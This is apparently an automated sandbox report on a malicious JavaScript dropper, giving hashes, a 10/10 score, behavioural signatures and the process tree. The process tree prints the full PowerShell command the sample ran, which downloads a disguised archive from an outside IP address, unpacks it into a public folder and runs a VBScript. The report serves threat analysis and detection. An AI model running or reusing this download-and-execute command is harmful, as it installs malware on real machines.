Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
07-12-2023 07:36
Static task
static1
Behavioral task
behavioral1
Sample
fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
Resource
win7-20231020-en
windows7-x64
4 signatures
150 seconds
General
-
Target
fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js
-
Size
7KB
-
MD5
b2195fa1ea604007f7a3664e0e49f591
-
SHA1
915985302f8fb7f37d07d22a8ec5cb5e8005fb47
-
SHA256
8550509a02f745f281a2a87c1f336b0fca32bd51c1074b281e5772e5c8a6ff60
-
SHA512
478d9dcd9391a2e224bd291325dde58883d197d4cec1d989a3f054363dc03e19075e174058db828fbfc668cb76e2cd2b73782bbad3cd6a582383a62d37a8b977
-
SSDEEP
96:xBdMQYYVlVS+RwbkiEi3gkFmRePXywbkOEi3ckFmRePXuUxBbLDIX3FU3i:qQYYXVS+R9SgbEPihScbEP+cBb+3FGi
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://23.145.120.49:249/js.jpg
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2492 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2492 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid process target process PID 2484 wrote to memory of 2492 2484 wscript.exe powershell.exe PID 2484 wrote to memory of 2492 2484 wscript.exe powershell.exe PID 2484 wrote to memory of 2492 2484 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\fb3c7a8f-e0ee-474d-918c-a9df0bbfe45c.js1⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://23.145.120.49:249/js.jpg' -Destination 'C:\Users\Public\zip.zip'; Expand-Archive -Path 'C:\Users\Public\zip.zip' -DestinationPath 'C:\Users\Public\' -Force;Remove-Item C:\Users\Public\zip.zip; C:\Users\Public\brave.vbs2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492